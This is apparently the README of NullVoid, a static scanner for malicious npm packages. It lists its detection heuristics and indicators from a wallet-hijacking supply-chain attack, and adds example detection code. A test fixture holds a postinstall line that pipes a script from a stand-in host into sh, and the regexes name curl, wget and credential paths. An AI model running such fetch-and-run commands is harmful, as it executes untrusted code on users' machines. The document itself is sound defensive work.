NullVoid
Ø NullVoid - Detect and invalidate malicious npm packages before they reach prod.
Detect malicious or compromised npm packages and flag risky code before it reaches production — without executing unsafe code.
🚀 Quick Start
# Install globally
npm i -g nullvoid
# Scan current project dependencies
npx nullvoid scan
# Scan a specific package
npx nullvoid scan suspicious-package
# Get verbose output
npx nullvoid scan --verbose
# Output results as JSON
npx nullvoid scan --output json
🔍 What NullVoid Detects
NullVoid uses multiple heuristic checks to identify potentially malicious packages, including sophisticated supply chain attacks:
1. Postinstall Script Analysis
- Detects packages with suspicious postinstall scripts
- Flags scripts that download or execute external code
- Identifies commands that could modify system files
2. Code Entropy Analysis
- Analyzes JavaScript files for unusually high entropy
- Detects obfuscated or packed code that might hide malicious intent
- Uses Shannon entropy to identify suspicious patterns
3. Suspicious File Patterns
- Scans for files with malicious naming conventions
- Detects executable files in npm packages
- Identifies hidden or obfuscated file structures
4. Wallet Hijacking Detection 🚨
- window.ethereum Interception: Detects packages that hook into wallet providers
- MetaMask Targeting: Identifies code that intercepts MetaMask transactions
- Transaction Redirection: Flags packages that silently redirect blockchain transactions
- Address Replacement: Detects attempts to replace legitimate wallet addresses
5. Network Response Manipulation 🚨
- Fetch/XMLHttpRequest Overrides: Detects packages that intercept network requests
- API Response Scanning: Identifies code that scans responses for blockchain addresses
- Levenshtein Algorithm Detection: Flags packages using "nearest match" algorithms
- Address Substitution: Detects replacement of legitimate addresses with attacker-controlled ones
6. Multi-Chain Targeting 🚨
- Cross-Chain Support: Detects packages supporting multiple blockchains
- Ethereum, Bitcoin, Litecoin, Tron, BCH, Solana: Identifies multi-chain attack capabilities
- Broader Attack Coverage: Flags packages that could target multiple cryptocurrency networks
7. Stealth Controls & Obfuscation 🚨
- stealthProxyControl Detection: Identifies hidden developer-like control interfaces
- Obfuscation Techniques: Detects code hiding mechanisms
- Hidden Control Mechanisms: Flags packages with concealed malicious functionality
- Eval/Decode Patterns: Identifies dynamic code execution attempts
8. Traditional Malicious Patterns
- Searches for crypto-mining code patterns
- Detects credential theft attempts
- Identifies data exfiltration mechanisms
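As an added example (not NullVoid's own code), here is how the postinstall-script and Shannon entropy heuristics from items 1 and 2 above could be implemented; the entropy threshold, the script regex and the sample files are assumptions constructed for this illustration:

```javascript
// Added example, not NullVoid's own code: the postinstall-script and Shannon
// entropy heuristics from sections 1 and 2 above, run over constructed files.
// Shannon entropy of a string in bits per character.
function shannonEntropy(text) {
  if (text.length === 0) return 0;
  const counts = new Map();
  for (const ch of text) counts.set(ch, (counts.get(ch) || 0) + 1);
  let h = 0;
  for (const n of counts.values()) h -= (n / text.length) * Math.log2(n / text.length);
  return h;
}

// Assumed threshold: readable JS sits well below it, packed or encoded blobs above.
const ENTROPY_THRESHOLD = 5.2;
// Lifecycle scripts that fetch or run remote code, or reach into system paths.
const SUSPICIOUS_SCRIPT = /\b(curl|wget|powershell|node\s+-e)\b|\b(ba)?sh\s+-c\b|\/etc\/|\.ssh\//i;

function checkPostinstall(pkgJson) {
  const script = (pkgJson.scripts || {}).postinstall;
  if (!script || !SUSPICIOUS_SCRIPT.test(script)) return null;
  return { type: 'POSTINSTALL_SCRIPT', severity: 'HIGH', details: script };
}

function checkEntropy(fileName, source) {
  const h = shannonEntropy(source);
  if (h < ENTROPY_THRESHOLD) return null;
  return { type: 'HIGH_ENTROPY', severity: 'MEDIUM', details: `${fileName}: ${h.toFixed(2)} bits/char` };
}

// files maps a path inside the package to its contents; returns the threat list.
function scanPackage(files) {
  const threats = [];
  const hit = checkPostinstall(JSON.parse(files['package.json'] || '{}'));
  if (hit) threats.push(hit);
  for (const [name, src] of Object.entries(files)) {
    if (!name.endsWith('.js')) continue;
    const e = checkEntropy(name, src); if (e) threats.push(e);
  }
  return threats;
}

// Constructed samples: a readable module and a blob cycling through all 94 printable
// ASCII characters (entropy log2(94), about 6.55 bits/char) standing in for a packed payload.
const PRINTABLE = Array.from({ length: 94 }, (_, i) => String.fromCharCode(33 + i)).join('');
const SAMPLE = {
  'package.json': JSON.stringify({ name: 'sample', scripts: { postinstall: 'curl https://example.invalid/x.sh | sh' } }),
  'index.js': 'const x = 1;\nconst y = 2;\nconst z = x + y;\n',
  'dist/bundle.js': PRINTABLE.repeat(8),
};
console.log(scanPackage(SAMPLE));
```

Character-level entropy is a coarse signal: hex-encoded payloads stay at or below 4 bits per character, so it only catches blobs that use a wide alphabet.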
📋 Usage Examples
Scan Your Project
# Navigate to your project directory
cd my-project
# Scan all dependencies in package.json
npx nullvoid scan
Scan Specific Packages
# Scan a single package
npx nullvoid scan express
# Scan with verbose output
npx nullvoid scan lodash --verbose
CI/CD Integration
# In your CI pipeline
npx nullvoid scan --output json > security-report.json
🚨 Real-World Attack Examples
NullVoid is designed to detect sophisticated supply chain attacks like the recent npm compromise:
Recent Attack: debug, chalk, and 16 other packages
- Attack Vector: Wallet hijacking through window.ethereum interception
- Technique: Silent transaction redirection to attacker-controlled addresses
- Multi-Chain: Targeted Ethereum, Bitcoin, Litecoin, Tron, BCH, and Solana
- Stealth: Used obfuscation and a stealthProxyControl global object
- Network Manipulation: Overrode fetch/XMLHttpRequest to replace addresses
- Obfuscated IoCs: _0x112fa8, _0x180f, runmask, newdlocal, checkethereumw
How NullVoid Would Detect This Attack:
# Scan would detect multiple threat types:
npx nullvoid scan
# Results would show:
⚠️ 4 threat(s) detected:
1. WALLET_HIJACKING: Package may contain wallet hijacking code
Severity: CRITICAL
Details: Detected pattern '_0x112fa8' that could redirect transactions
2. NETWORK_MANIPULATION: Package may manipulate network responses
Severity: HIGH
Details: Detected pattern 'fetch.*override' for address replacement
3. MULTI_CHAIN_TARGETING: Package supports multiple blockchain networks
Severity: MEDIUM
Details: Detected multi-chain capabilities for broader attack coverage
4. STEALTH_CONTROLS: Package contains stealth controls or obfuscation
Severity: HIGH
Details: Detected pattern 'stealthProxyControl' hidden control mechanisms
Specific IoC Detection:
NullVoid detects the exact obfuscated strings and patterns used in the recent attack:
- _0x112fa8 - Primary obfuscated function identifier
- _0x180f - Secondary obfuscated string pattern
- stealthProxyControl - Hidden developer control interface
- runmask - Malicious function name
- newdlocal - Attack-specific variable
- checkethereumw - Ethereum wallet checking function
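An added example (not NullVoid's own code) of matching the wallet hijacking, network manipulation, stealth control and multi-chain signals described above, including the IoC strings just listed, against a constructed and inert snippet; the rule set, the three-network threshold and both sample sources are assumptions made for this illustration:

```javascript
// Added example, not NullVoid's own code: rule matching for the wallet-hijacking,
// network-manipulation, stealth-control and multi-chain heuristics described above,
// including the obfuscated IoC strings, run over a constructed snippet.
const RULES = [
  { type: 'WALLET_HIJACKING', severity: 'CRITICAL', patterns: [
      /window\.ethereum/, /ethereum\.request\s*=/, /_0x112fa8/, /checkethereumw/] },
  { type: 'NETWORK_MANIPULATION', severity: 'HIGH', patterns: [
      /\bfetch\s*=\s*(function|async|\()/, /XMLHttpRequest\.prototype\.(open|send)\s*=/] },
  { type: 'STEALTH_CONTROLS', severity: 'HIGH', patterns: [
      /stealthProxyControl/, /\b(runmask|newdlocal)\b/, /_0x180f/, /\beval\s*\(/, /\batob\s*\(/] },
];
// Networks named in the attack above; three or more in one file is a MEDIUM signal.
const CHAINS = [/\bethereum\b/i, /\bbitcoin\b/i, /\blitecoin\b/i, /\btron\b/i, /\bbch\b/i, /\bsolana\b/i];
const RANK = { CRITICAL: 0, HIGH: 1, MEDIUM: 2, LOW: 3 };

// Returns the threats found in one source file, most severe first.
function matchRules(source) {
  const threats = [];
  for (const rule of RULES) {
    const hits = rule.patterns.filter((re) => re.test(source)).map(String);
    if (hits.length > 0) threats.push({ type: rule.type, severity: rule.severity, details: `matched ${hits.join(', ')}` });
  }
  const chains = CHAINS.filter((re) => re.test(source)).length;
  if (chains >= 3) threats.push({ type: 'MULTI_CHAIN_TARGETING', severity: 'MEDIUM', details: `${chains} networks referenced` });
  return threats.sort((a, b) => RANK[a.severity] - RANK[b.severity]);
}

// Renders the report in the same shape as the scan output shown above.
function formatReport(threats) {
  if (threats.length === 0) return 'No threats detected';
  const lines = [`${threats.length} threat(s) detected:`];
  threats.forEach((t, i) => lines.push(`${i + 1}. ${t.type}`, `   Severity: ${t.severity}`, `   Details: ${t.details}`));
  return lines.join('\n');
}

// Constructed sample: inert code carrying the indicators (the fetch wrapper only
// passes calls through), plus a clean module for comparison.
const SUSPICIOUS_SOURCE = [
  "const _0x112fa8 = require('./helper');",
  "const checkethereumw = () => typeof window.ethereum !== 'undefined';",
  'const origFetch = window.fetch;',
  'window.fetch = function (...args) { return origFetch.apply(this, args); };',
  'globalThis.stealthProxyControl = { runmask: true };',
  "const chains = ['ethereum', 'bitcoin', 'solana', 'tron'];",
].join('\n');
const CLEAN_SOURCE = "const { ethers } = require('ethers');\nmodule.exports = (v) => ethers.formatEther(v);";
console.log(formatReport(matchRules(SUSPICIOUS_SOURCE)));
```

String-level rules like these are cheap but brittle: a legitimate wallet library also mentions several networks and may wrap fetch, so MEDIUM findings are review prompts rather than verdicts.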
🛡️ Security Features
- Static Analysis Only: Never executes potentially malicious code
- Multiple Detection Methods: Combines various heuristics for comprehensive coverage
- Real-time Scanning: Fast analysis without network dependencies
- CI/CD Ready: Easy integration into automated workflows
- Supply Chain Focus: Specifically designed to detect npm package compromises
🔧 Configuration
Command Line Options
Option | Description | Default
---|---|---
--verbose | Enable detailed output | false
--output <format> | Output format (json, table) | table
--version | Show version information | -
--help | Show help information | -
Example Output
🔍 NullVoid Scan Results
⚠️ 2 threat(s) detected:
1. POSTINSTALL_SCRIPT: Package contains postinstall script with suspicious commands
Package: suspicious-package
Severity: HIGH
2. HIGH_ENTROPY: Package contains files with unusually high entropy
Package: obfuscated-lib
Severity: MEDIUM
Scanned 15 package(s) in 234ms
🚨 Threat Severity Levels
- CRITICAL: Wallet hijacking, transaction redirection, or immediate financial threat
- HIGH: Network manipulation, stealth controls, or significant security risk
- MEDIUM: Suspicious behavior requiring review
- LOW: Minor concerns or best practice violations
🚀 Upcoming Features
High Priority
- Real Package Tarball Analysis - Download and extract actual package files for deep scanning
- SARIF Output Format - Better CI/CD integration with standardized security reporting
- Configurable Rules System - JSON/YAML configuration for custom detection patterns
- Dependency Tree Analysis - Scan transitive dependencies for hidden threats
Performance & Integration
- Parallel Scanning - Multi-threaded analysis for faster results
- Public IoC Feeds - Integration with Snyk, npm advisories, and other threat intelligence
- Signature Hashing - Detect package tampering and verify integrity
- Structured Logging - Comprehensive reporting and audit trails
🤝 Contributing
We welcome contributions! Please see our Contributing Guide for details.
Development Setup
# Clone the repository
git clone https://github.com/kurt-grung/NullVoid.git
cd NullVoid
# Install dependencies
npm install
# Run tests
npm test
# Test the CLI
node bin/nullvoid.js scan
📄 License
MIT License - see LICENSE for details.
⚠️ Disclaimer: NullVoid is designed to help identify potentially malicious packages, but it's not a substitute for comprehensive security practices. Always review packages manually and keep your dependencies updated.